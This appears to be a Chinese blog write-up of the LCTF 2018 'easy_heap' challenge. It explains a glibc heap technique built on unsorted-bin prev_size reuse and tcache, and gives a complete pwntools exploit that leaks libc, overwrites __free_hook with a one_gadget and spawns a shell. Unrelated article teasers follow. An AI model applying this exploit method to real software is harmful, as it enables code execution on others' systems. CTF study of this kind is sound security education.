Sadmess
Sadmess

Lctf 2018 easy_heap

题目分析

学长(衣食父母)出的题当然要好好分析了,不看ctfwiki我也分析不明白
在没有办法手动写入 prev_size ,但又必须使用 prev_size 才可以进行利用的情况下,考虑使用系统写入的 prev_size 。

方法为:在 unsorted bin 合并时会写入 prev_size,而该 prev_size 不会被轻易覆盖(除非有新的 prev_size 需要写入),所以可以利用该 prev_size 进行利用。

攻击流程

  • 将 A -> B -> C 三块 unsorted bin chunk 依次进行释放
  • A 和 B 合并,此时 C 前的 prev_size 写入为 0x200
  • A 、 B 、 C 合并,步骤 2 中写入的 0x200 依然保持
  • 利用 unsorted bin 切分,分配出 A
  • 利用 unsorted bin 切分,分配出 B,注意此时不要覆盖到之前的 0x200
  • 将 A 再次释放为 unsorted bin 的堆块,使得 fd 和 bk 为有效链表指针
  • 此时 C 前的 prev_size 依然为 0x200(未使用到的值),A B C 的情况: A (free) -> B (allocated) -> C (free),如果使得 B -- 进行溢出,则可以将已分配的 B 块包含在合并后的释放状态 unsorted bin 块中。

但是在这个过程中需要注意 tcache 的影响。

#! /usr/bin/env python2
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
import sys
import os
import os.path
from pwn import *
#context(os='linux', arch='amd64', log_level='debug')

p = process('./easy_heap')

def cmd(idx):
    p.recvuntil('>')
    p.sendline(str(idx))


def new(size, content):
    cmd(1)
    p.recvuntil('>')
    p.sendline(str(size))
    p.recvuntil('> ')
    if len(content) >= size:
        p.send(content)
    else:
        p.sendline(content)


def delete(idx):
    cmd(2)
    p.recvuntil('index \n> ')
    p.sendline(str(idx))


def show(idx):
    cmd(3)
    p.recvuntil('> ')
    p.sendline(str(idx))
    return p.recvline()[:-1]


def main():
    # Your exploit script goes here

    # step 1: get three unsortedbin chunks
    # note that to avoid top consolidation, we need to arrange them like:
    # tcache * 6 -> unsortd  * 3 -> tcache
    for i in range(7):
        new(0x10, str(i) + ' - tcache')

    for i in range(3):
        new(0x10, str(i + 7) + ' - unsorted') # three unsorted bin chunks

    # arrange:
    for i in range(6):
        delete(i)
    delete(9)   #第十个块是tcache防合并块
    for i in range(6, 9):
        delete(i)  #设置第二个块的presize为0x200

    # step 2: use unsorted bin to overflow, and do unlink, trigger consolidation (overecvlineap)
    for i in range(7):
        new(0x10, str(i) + ' - tcache')

    # rearrange to take second unsorted bin into tcache chunk, but leave first 
    # unsorted bin unchanged
    new(0x10, '7 - first')
    new(0x10, '8 - second')
    new(0x10, '9 - third')

    for i in range(6):
        delete(i)
    # move second into tcache
    delete(8)
    # delete first to provide valid fd & bk
    delete(7)  

    new(0xf8, '0 - overflow')  #跳过presize直接设置size的inuse为0
    
    # fill up tcache
    delete(6)

    # trigger
    delete(9)

    # step 3: leak, fill up 
    for i in range(7):
        new(0x10, str(i) + ' - tcache')
    new(0x10, '8 - fillup')

    libc_leak = u64(show(0).strip().ljust(8, '\x00'))
    p.info('libc leak {}'.format(hex(libc_leak)))
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    libc.address = libc_leak - 0x3ebca0
    one_gadget = libc.address + 324386 
    # step 4: constrecvuntilct UAF, write into __free_hook
    new(0x10, '9 - next')
    
    # these two provides sendlineots for tcache
    delete(2)  #多释放一个,因为后面申请的时候最后一个可控地址块是第三个,ctfwiki这里有一点小问题
    delete(0)
    delete(9)
    new(0x10, p64(libc.symbols['__free_hook'])) # 0
    new(0x10, '')
    new(0x10, p64(one_gadget))
    delete(1)

    p.interactive()

if __name__ == '__main__':
    main()

你可能感兴趣的:(Lctf 2018 easy_heap)

  • ZYNQ-7000 平台LwIP RAW Socket 模式下 TCP速率测试(Jperf) WILLFr tcp/ip网络服务器
    在ZYNQ-7000平台下,使用Jperf测试LwIPRAWSocket模式下的TCP速率,工程代码适配到Vivado2018.2SDK版本,并在zynq-7000平台验证测试。LwIPRAWsocket模式下,TCP速率大于900Mbps,Jperf测试结果如下:工程文件:https://download.csdn.net/download/csdn6403/90482672?spm=1011.
  • 1990-2018年 全国投入产出数据表 小王毕业啦 大数据大数据人工智能数据分析数据挖掘深度学习毕业论文数据统计
    1990-2018年全国投入产出数据表https://download.csdn.net/download/2401_84585615/90214697https://download.csdn.net/download/2401_84585615/90214697全国投入产出表是反映各部门之间经济活动相互联系和相互依赖关系的重要工具。它通过详细列示各部门的投入和产出,揭示了经济系统内部的结构和运
  • 气候变化和人类活动对中国植被固碳的贡献量化数据(2001-2018) 树谷-胡老师 资源arcgis
    气候变化和人类活动对中国植被固碳的贡献量化数据(2001-2018)数据分享:气候变化和人类活动对中国植被固碳的贡献量化数据(2001-2018)该数据集包括中国2001~2018年月尺度或年尺度的地表短波波段反照率、植被光合有效辐射吸收比、叶面积指数、森林覆盖度和非森林植被覆盖度、地表温度、地表净辐射、地表蒸散发、地上部分自养呼吸、地下部分自养呼吸、总初级生产力和净初级生产力。空间分辨率为0.1
  • Threejs 实现 VR 看房完结 多喜乐 长安宁 threejsvuevrvue.jsthree
    效果:threejs3dVr看房gitee地址:threejs-3d-map:1、threejs实现3d地图效果链接:https://blog.csdn.net/qq_57952018/article/details/1430539902、threejs实现vr看房主要代码:src/views/PanoramicView/index.vueimport{computed,onMounted,onU
  • 程序化广告行业(11/89):洗牌期与成熟期的变革及行业生态解析 lilye66 程序化广告kafkaflink时序数据库
    程序化广告行业(11/89):洗牌期与成熟期的变革及行业生态解析大家好!一直以来,我都在钻研程序化广告行业,在学习过程中积累了不少干货,特别想和大家分享,一起学习进步。这篇文章接着上一篇,深入剖析程序化广告行业在洗牌期和成熟期的发展变化,以及整个行业生态的构成。一、洗牌期的行业变革2017-2018年,程序化广告行业进入洗牌期,这是行业发展过程中自我调整、去伪存真的关键阶段。在前期的燥热发展中,行
  • Spring学习之路:环境搭建、核心API与配置文件细节 qq_44766305 Springspringjava后端
    1.软件版本1.JDK1.8+2.Maven3.5+3.IDEA2018+4.SpringFramework5.1.5官方网站www.spring.io2.环境搭建Spring的jar包#设置pom依赖可以去Maven中央仓库org.springframeworkspring-context5.1.4.RELEASESpring的配置文件1.配置文件的放置位置:任意位置,没有硬性要求2.配置文件命
  • udp2raw android,关于udpspeeder和udp2raw部署的一些补充,及使用体会 鱼吞舟 udp2rawandroid
    本帖最后由zardon于2018-1-1915:12编辑首先还是感谢开发者@wangyu-提供这么好用的工具,也感谢ASUS固件及插件的作者,本人上海电信,起初使用koolgame,效果相当明显。但是使用一段时间后会莫名大量丢包,似乎是被运营商QOS了,并且koolgame时不时掉线,在高峰期几乎无法正常使用。使用udpspeederV2+udp2raw之后晚上9-10点高峰期能够正常玩战地,没有
  • 【光流】——liteflownet论文与代码浅读 农夫山泉2号 光流计算机视觉深度学习人工智能光流liteflownet
    光流,liteflownetcode:mmflowCVPR20181.前言FlowNet2是最先进的光流估计卷积神经网络(CNN),需要超过160M的参数来实现精确的流量估计。在本文中,我们提出了一种替代网络,它在Sintel和KITTI基准测试上优于FlowNet2,同时在模型尺寸上要小30倍,在运行速度上要快1.36倍。这是通过深入研究当前框架中可能被遗漏的架构细节而实现的:(1)我们通过轻量
  • 怎么定义世界模型,Sora/Genie/JEPA 谁是世界模型呢?(1) 周博洋K 分布式人工智能深度学习自然语言处理机器学习
    说这个问题之前先看一下什么是世界模型,它的定义是什么?首先世界模型的起源是咋回事呢?其实世界模型在ML领域不是什么新概念,远远早于Transfomer这些东西被提出来,因为它最早是强化学习RL领域的,在20世纪90年代由JuergenSchmiduber实验室给提出来的。2018年被Ha和Schmiduber发表了用RNN来做世界模型的论文,相当于给他重新做了一次定义。然后就是最近跟着Sora,G
  • Python __init__.py 愚昧之山绝望之谷开悟之坡 pythoninit
    Python__init__.py作用详解尼古拉苏关注12018.06.1012:57:34字数745阅读45,278转载于:https://www.cnblogs.com/tp1226/p/8453854.html__init__.py该文件的作用就是相当于把自身整个文件夹当作一个包来管理,每当有外部import的时候,就会自动执行里面的函数。1.标识该目录是一个python的模块包(modul
  • 【SVN】svn info用法总结 飞翔的鲲 【实用工具专栏】svnsvninfoBASEHEAD
    ###Date:2018-1-21===============================================================================
  • FastExcel/EasyExcel简介以及源码解析 舌尖上的五香 java
    简介官网地址GitHub地址基于MIT协议发展历史由EasyExcel发展而来2018/02/07:发布1.0.02019/09/17:发布2.0.02021/10/21:发布3.0.12024/06/18:发布4.0.02024/11/06:进入维护模式2024/12/05:发布FastExcel1.0.0主要特性高性能读写简单易用流式操作读取执行行数技术原理内存优化:基于流式读取技术,不需要一
  • CentOS7.9内核离线升级内核 一直前行 linux运维服务器
    升级前内核版本:[root@vrgv252~]#uname-aLinuxvrgv252.com3.10.0-957.el7.x86_64#1SMPThuNov823:39:32UTC2018x86_64x86_64x86_64GNU/Linux下载内核文件:建议使用清华源Indexof/elrepo/kernel/el7/x86_64/RPMS/|清华大学开源软件镜像站|TsinghuaOpenS
  • 世界超高清大会发布重大技术成果:博冠自主创新推动8K摄像机攻关 8K超高清 人工智能vr5G科技超分辨率重建
    一、世界超高清大会背景介绍:近日,由工业和信息化部、国家广播电视总局、中央广播电视总台、广东省人民政府主办的2023世界超高清视频产业发展大会在广州·越秀国际会议展览中心盛大召开。自2018年创办以来,大会已成功举办四届,成为全球超高清视频产业领域规模大、规格高、影响力强、带动性广的年度盛会。本次大会以“超高清视界高质量发展”为主题,并向全球正式发布一批超高清视频显示产业重大技术创新成果和超高清视
  • (ECCV2018)CBAM改进思路 这张生成的图像能检测吗 即插即用模块+改进思路深度学习人工智能计算机视觉机器学习图像处理神经网络论文笔记
    论文链接:https://arxiv.org/abs/1807.06521论文题目:CBAM:ConvolutionalBlockAttentionModule会议:ECCV2018论文方法利用特征的通道间关系生成了一个通道注意图。由于特征映射的每个通道被认为是一个特征检测器,通道注意力集中在给定输入图像的“什么”是有意义的。为了有效地计算通道注意力,我们压缩了输入特征映射的空间维度。对于空间信息
  • 1.6 从 GPT-1 到 GPT-3.5:一路的风云变幻 少林码僧 AI大模型应用实战专栏gptgpt-3
    从GPT-1到GPT-3.5:一路的风云变幻人工智能的进步一直是科技领域的一个重要话题,而在自然语言处理(NLP)领域,GPT(GenerativePre-trainedTransformer)系列模型的发布,标志着一个又一个技术突破。从2018年发布的GPT-1到2022年推出的GPT-3.5,OpenAI的每一次更新都在推动着人工智能的发展,改变了我们与计算机互动的方式。本文将带你一起回顾GP
  • 网络安全 如何构建DMZ区 网络安全King web安全安全
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快当整个世界都越来越离不开网络,那么网络安全自然也就成为了重中之重。特别是那些曾经遭受过黑客攻击的企业,想必对于这一点的感受更是尤其深刻。7月31日,卡巴斯基实验室主办的“CyberInsights2018”网络安全大会在北京举行。本次大会是卡巴斯基实验室亚太区首届多城市“CyberInsights2018”安全路演系列活动,首发两站台北及
  • 自然语言处理(NLP)领域大语言模型学习目录大全 彬彬侠 大模型自然语言处理NLP大模型LLMGPTBERTGLM
    本文主要收集了自然语言处理(NLP)领域的大语言模型,可以可以通过点击标题链接查看具体的详情。GPT系列GPT-1(GenerativePre-trainedTransformer1)模型GPT-1(GenerativePre-trainedTransformer1)是OpenAI在2018年6月提出的第一代GPT模型,也是第一个基于Transformer结构的自回归(Autoregressive
  • Java新特性梳理——Java17 疯狂的洛必达 javapython前端linux开发语言
    highlight:xcodetheme:vuepress概述JDK16刚发布半年(2021/03/16),JDK17又如期而至(2021/09/14),这个时间点特殊,蹭苹果发布会的热度?记得当年JDK15的发布也是同天。Oracle宣布,从JDK17开始,后面的JDK都全部免费提供!!!JDK17是自2018年JDK11后的第二个长期支持版本,支持到2029年9月,支持时间长达8年,这下可以不
  • 2018 react 大会_React Conf 2018的经验教训 cumichun6193 javajavascriptpython编程语言vueViewUI
    2018react大会byYangshunTay阳顺泰ReactConf2018的经验教训(LessonsLearnedatReactConf2018)IwasfortunatetohaveattendedReactConf2018thankstomymanagers—itwasanawesomeevent.IhavebeenwatchingpastReactConfvideosonlineand
  • PyCharm2018基础环境配置【坚持实测】 tx_rain
    搭建PyCharm2018环境1、安装PyCharmPyCharm2018.3.3(ProfessionalEdition)安装环境:win764位2、激活PyCharm2.1C:\Windows\System32\drivers\etc下hosts文件,添加一行:0.0.0.0account.jetbrains.com2.2运行PyCharm,输入激活码:JKHX300590-(此处省略,需要的
  • pycharm2018 qq_35581867 安装指南
    因公司的需求,需要做一个爬取最近上映的电影、列车号、航班号、机场、车站等信息,所以需要我做一个爬虫项目,当然java也可以做爬虫,但是还是没有python这样方便,所以也开始学习Python啦!!!欲善其事,必先利其器。这里我为大家提供了三种激活方式:授权服务器激活:适合小白,一步到位,但服务器容易被封激活码激活:适合小白,Windows、Mac、Linux都适用且无其他副作用,推荐~破解补丁激活
  • Pycharm2018 中文版安装教程 ZCY5202015 开发工具软件pycharmpythonide
    Pycharm2018中文版安装教程软件简介:PyCharm是一款IDE集成开发环境,主要功能包括代码调试、语法高亮、智能提示、单元测试、版本控制等,新版2018版添加了对Python3.7支持,增加了多行TODO注释、时间跟踪、以及改进searcheverywhere功能等,可以让用户快速的开发程序。(本教程仅供学习交流使用)安装前须知:1.解压和安装前先关闭360、电脑管家等所有杀毒软件,防止
  • JavaEE概述和入门 曦暮 servletservletjavacgi
    javaEE开发:为什么学JavaEE在我们学习Java语言时,你肯定是想知道Java到底能干些什么,现在到了JavaEE这个阶段,就可以告诉你了。JavaEE:Java平台企业版(JavaPlatformEnterpriseEdition),之前称为Java2Platform,EnterpriseEdition(J2EE),2018年3月更名为JakartaEE(这个名称应该还没有得到群众认可)
  • 鸿蒙全栈开发 D1 GH小杨 harmonyos华为typescript
    鸿蒙全栈开发第一天第一部分:鸿蒙操作系统基础1.1鸿蒙发展史(深度解析)2012-01-012013-01-012014-01-012015-01-012016-01-012017-01-012018-01-012019-01-012020-01-012021-01-012022-01-012023-01-012024-01-01分布式技术预研微内核验证HarmonyOS1.0OpenHarmon
  • TensorFlow.js - 使用 CNN(卷积神经网络) 识别手写数字 宁静_致远_ 前端开发javascripttensorflowcnn
    目录index.htmldata.jsscript.js备注参考文献index.htmlTensorFlow.jsTutorialdata.js/***@license*Copyright2018GoogleLLC.AllRightsReserved.*LicensedundertheApacheLicense,Version2.0(the"License");*youmaynotusethisf
  • MobileNet 进化史: 从 V1 到 V3(V2篇) kuweicai 深度总结深度学习MobileNetv1v2v3总结
    MobileNet进化史:从V1到V3(V2篇)这部分内容总共由如下3篇文章构成。MobileNet进化史:从V1到V3(V1篇)MobileNet进化史:从V1到V3(V2篇)MobileNet进化史:从V1到V3(V3篇)MobileNet实战:基于MobileNet的人脸表情分类1.前言AndrewG.Howard等于2018年在MobileNetV1的基础上又提出了改进版本MobileNe
  • 设计稿转代码技术原理深度解析 寒鸦xxx 科技研究所css前端
    一、设计稿转代码技术概述1.历史来源设计稿转代码(DesigntoCode,D2C)技术起源于低代码运动和设计系统的普及。早期前端开发依赖手工编码还原设计稿,效率低下且易出错。2010年代,随着Figma、Sketch等矢量设计工具的标准化,其基于JSON的结构化数据存储(如Figma的节点树)为自动化转码奠定了基础。2018年后,阿里Imgcook、微软Sketch2Code等工具首次将AI算法
  • Self-Attentive Sequential Recommendation论文阅读笔记 调包调参侠 推荐系统学习深度学习机器学习神经网络算法
    SASRec论文阅读笔记论文标题:Self-AttentiveSequentialRecommendation发表于:2018ICDM作者:Wang-ChengKang,JulianMcAuley论文代码:https://github.com/pmixer/SASRec.pytorch论文地址:https://arxiv.org/pdf/1808.09781v1.pdf摘要顺序动态是许多现代推荐系
  • 听说Zynq-手把手教你自定义ip核并调用 不只会拍照的程序猿 听说ZYNQ嵌入式eclipseubuntufpgaverilog
    概述小编最近在研究Zynq,因为对其相对陌生,在探索过程中也遇到了不少坑,这里将如何创建IP核并调用的方法步骤总结记录,以免日后忘记。注意★环境:Vivado2018.2。开发板:digilent(迪芝伦)公司的ZYBO创建IP核创建工程1.打开vivado软件,选择CreateProject创建项目。2.输入工程名和路径,勾选createprojectsubdirectory,为你自动在目录下创
  • ASM系列五 利用TreeApi 解析生成Class lijingyao8206 ASM字节码动态生成ClassNodeTreeAPI
       前面CoreApi的介绍部分基本涵盖了ASMCore包下面的主要API及功能,其中还有一部分关于MetaData的解析和生成就不再赘述。这篇开始介绍ASM另一部分主要的Api。TreeApi。这一部分源码是关联的asm-tree-5.0.4的版本。          在介绍前,先要知道一点, Tree工程的接口基本可以完
  • 链表树——复合数据结构应用实例 bardo 数据结构树型结构表结构设计链表菜单排序
    我们清楚:数据库设计中,表结构设计的好坏,直接影响程序的复杂度。所以,本文就无限级分类(目录)树与链表的复合在表设计中的应用进行探讨。当然,什么是树,什么是链表,这里不作介绍。有兴趣可以去看相关的教材。 需求简介: 经常遇到这样的需求,我们希望能将保存在数据库中的树结构能够按确定的顺序读出来。比如,多级菜单、组织结构、商品分类。更具体的,我们希望某个二级菜单在这一级别中就是第一个。虽然它是最后
  • 为啥要用位运算代替取模呢 chenchao051 位运算哈希汇编
        在hash中查找key的时候,经常会发现用&取代%,先看两段代码吧,     JDK6中的HashMap中的indexFor方法: /** * Returns index for hash code h. */ static int indexFor(int h, int length) {
  • 最近的情况 麦田的设计者 生活感悟计划软考
          今天是2015年4月27号      整理一下最近的思绪以及要完成的任务             1、最近在驾校科目二练车,每周四天,练三周。其实做什么都要用心,追求合理的途径解决。为
  • PHP去掉字符串中最后一个字符的方法 IT独行者 PHP字符串
    今天在PHP项目开发中遇到一个需求,去掉字符串中的最后一个字符 原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6 代码如下: $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr;
  • hadoop在linux上单机安装过程 _wy_ linuxhadoop
    1、安装JDK     jdk版本最好是1.6以上,可以使用执行命令java -version查看当前JAVA版本号,如果报命令不存在或版本比较低,则需要安装一个高版本的JDK,并在/etc/profile的文件末尾,根据本机JDK实际的安装位置加上以下几行:    export JAVA_HOME=/usr/java/jdk1.7.0_25  
  • JAVA进阶----分布式事务的一种简单处理方法 无量 多系统交互分布式事务
    每个方法都是原子操作: 提供第三方服务的系统,要同时提供执行方法和对应的回滚方法 A系统调用B,C,D系统完成分布式事务 =========执行开始======== A.aa(); try { B.bb(); } catch(Exception e) { A.rollbackAa(); } try { C.cc(); } catch(Excep
  • 安墨移动广 告:移动DSP厚积薄发 引领未来广 告业发展命脉 矮蛋蛋 hadoop互联网
      “谁掌握了强大的DSP技术,谁将引领未来的广 告行业发展命脉。”2014年,移动广 告行业的热点非移动DSP莫属。各个圈子都在纷纷谈论,认为移动DSP是行业突破点,一时间许多移动广 告联盟风起云涌,竞相推出专属移动DSP产品。   到底什么是移动DSP呢?   DSP(Demand-SidePlatform),就是需求方平台,为解决广 告主投放的各种需求,真正实现人群定位的精准广
  • myelipse设置 alafqq IP
      在一个项目的完整的生命周期中,其维护费用,往往是其开发费用的数倍。因此项目的可维护性、可复用性是衡量一个项目好坏的关键。而注释则是可维护性中必不可少的一环。 注释模板导入步骤  安装方法: 打开eclipse/myeclipse 选择 window-->Preferences-->JAVA-->Code-->Code
  • java数组 百合不是茶 java数组
    java数组的   声明  创建  初始化;   java支持C语言      数组中的每个数都有唯一的一个下标 一维数组的定义 声明: int[] a = new int[3];声明数组中有三个数int[3] int[] a 中有三个数,下标从0开始,可以同过for来遍历数组中的数
  • javascript读取表单数据 bijian1013 JavaScript
    利用javascript读取表单数据,可以利用以下三种方法获取: 1、通过表单ID属性:var a = document.getElementByIdx_x_x("id"); 2、通过表单名称属性:var b = document.getElementsByName("name"); 3、直接通过表单名字获取:var c = form.content.
  • 探索JUnit4扩展:使用Theory bijian1013 javaJUnitTheory
    理论机制(Theory) 一.为什么要引用理论机制(Theory)         当今软件开发中,测试驱动开发(TDD — Test-driven development)越发流行。为什么 TDD 会如此流行呢?因为它确实拥有很多优点,它允许开发人员通过简单的例子来指定和表明他们代码的行为意图。 TDD 的优点:     &nb
  • [Spring Data Mongo一]Spring Mongo Template操作MongoDB bit1129 template
    什么是Spring Data Mongo Spring Data MongoDB项目对访问MongoDB的Java客户端API进行了封装,这种封装类似于Spring封装Hibernate和JDBC而提供的HibernateTemplate和JDBCTemplate,主要能力包括 1. 封装客户端跟MongoDB的链接管理 2. 文档-对象映射,通过注解:@Document(collectio
  • 【Kafka八】Zookeeper上关于Kafka的配置信息 bit1129 zookeeper
    问题: 1. Kafka的哪些信息记录在Zookeeper中 2. Consumer Group消费的每个Partition的Offset信息存放在什么位置 3. Topic的每个Partition存放在哪个Broker上的信息存放在哪里 4. Producer跟Zookeeper究竟有没有关系?没有关系!!!   //consumers、config、brokers、cont
  • java OOM内存异常的四种类型及异常与解决方案 ronin47 java OOM 内存异常
           OOM异常的四种类型:       一: StackOverflowError :通常因为递归函数引起(死递归,递归太深)。-Xss 128k 一般够用。        二: out Of memory: PermGen Space:通常是动态类大多,比如web 服务器自动更新部署时引起。-Xmx
  • java-实现链表反转-递归和非递归实现 bylijinnan java
    20120422更新: 对链表中部分节点进行反转操作,这些节点相隔k个: 0->1->2->3->4->5->6->7->8->9 k=2 8->1->6->3->4->5->2->7->0->9 注意1 3 5 7 9 位置是不变的。 解法: 将链表拆成两部分: a.0-&
  • Netty源码学习-DelimiterBasedFrameDecoder bylijinnan javanetty
    看DelimiterBasedFrameDecoder的API,有举例: 接收到的ChannelBuffer如下: +--------------+ | ABC\nDEF\r\n | +--------------+ 经过DelimiterBasedFrameDecoder(Delimiters.lineDelimiter())之后,得到: +-----+----
  • linux的一些命令 -查看cc攻击-网口ip统计等 hotsunshine linux
    Linux判断CC攻击命令详解 2011年12月23日 ⁄ 安全 ⁄ 暂无评论 查看所有80端口的连接数 netstat -nat|grep -i '80'|wc -l 对连接的IP按连接数量进行排序 netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 查看TCP连接状态 n
  • Spring获取SessionFactory ctrain sessionFactory
    String sql = "select sysdate from dual"; WebApplicationContext wac = ContextLoader.getCurrentWebApplicationContext(); String[] names = wac.getBeanDefinitionNames(); for(int i=0; i&
  • Hive几种导出数据方式 daizj hive数据导出
    Hive几种导出数据方式   1.拷贝文件   如果数据文件恰好是用户需要的格式,那么只需要拷贝文件或文件夹就可以。 hadoop fs –cp source_path target_path   2.导出到本地文件系统   --不能使用insert into local directory来导出数据,会报错 --只能使用
  • 编程之美 dcj3sjt126com 编程PHP重构
    我个人的 PHP 编程经验中,递归调用常常与静态变量使用。静态变量的含义可以参考 PHP 手册。希望下面的代码,会更有利于对递归以及静态变量的理解   header("Content-type: text/plain"); function static_function () { static $i = 0; if ($i++ < 1
  • Android保存用户名和密码 dcj3sjt126com android
    转自:http://www.2cto.com/kf/201401/272336.html 我们不管在开发一个项目或者使用别人的项目,都有用户登录功能,为了让用户的体验效果更好,我们通常会做一个功能,叫做保存用户,这样做的目地就是为了让用户下一次再使用该程序不会重新输入用户名和密码,这里我使用3种方式来存储用户名和密码 1、通过普通 的txt文本存储 2、通过properties属性文件进行存
  • Oracle 复习笔记之同义词 eksliang Oracle 同义词Oracle synonym
    转载请出自出处:http://eksliang.iteye.com/blog/2098861 1.什么是同义词       同义词是现有模式对象的一个别名。       概念性的东西,什么是模式呢?创建一个用户,就相应的创建了 一个模式。模式是指数据库对象,是对用户所创建的数据对象的总称。模式对象包括表、视图、索引、同义词、序列、过
  • Ajax案例 gongmeitao Ajaxjsp
    数据库采用Sql Server2005 项目名称为:Ajax_Demo 1.com.demo.conn包 package com.demo.conn; import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException; //获取数据库连接的类public class DBConnec
  • ASP.NET中Request.RawUrl、Request.Url的区别 hvt .netWebC#asp.nethovertree
      如果访问的地址是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree%3C&n=myslider#zonemenu那么Request.Url.ToString() 的值是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree<&
  • SVG 教程 (七)SVG 实例,SVG 参考手册 天梯梦 svg
    SVG 实例 在线实例 下面的例子是把SVG代码直接嵌入到HTML代码中。 谷歌Chrome,火狐,Internet Explorer9,和Safari都支持。 注意:下面的例子将不会在Opera运行,即使Opera支持SVG - 它也不支持SVG在HTML代码中直接使用。   SVG 实例 SVG基本形状 一个圆 矩形 不透明矩形 一个矩形不透明2 一个带圆角矩
  • 事务管理 luyulong javaspring编程事务
    事物管理 spring事物的好处 为不同的事物API提供了一致的编程模型 支持声明式事务管理 提供比大多数事务API更简单更易于使用的编程式事务管理API 整合spring的各种数据访问抽象 TransactionDefinition 定义了事务策略 int getIsolationLevel()得到当前事务的隔离级别 READ_COMMITTED 
  • 基础数据结构和算法十一:Red-black binary search tree sunwinner AlgorithmRed-black
      The insertion algorithm for 2-3 trees just described is not difficult to understand; now, we will see that it is also not difficult to implement. We will consider a simple representation known
  • centos同步时间 stunizhengjia linux集群同步时间
    做了集群,时间的同步就显得非常必要了。 以下是查到的如何做时间同步。 在CentOS 5不再区分客户端和服务器,只要配置了NTP,它就会提供NTP服务。 1)确认已经ntp程序包: # yum install ntp 2)配置时间源(默认就行,不需要修改) # vi /etc/ntp.conf server pool.ntp.o
  • ITeye 9月技术图书有奖试读获奖名单公布 ITeye管理员 ITeye
    ITeye携手博文视点举办的9月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 9月试读活动回顾:http://webmaster.iteye.com/blog/2118112本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀):      《NFC:Arduino、Andro
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他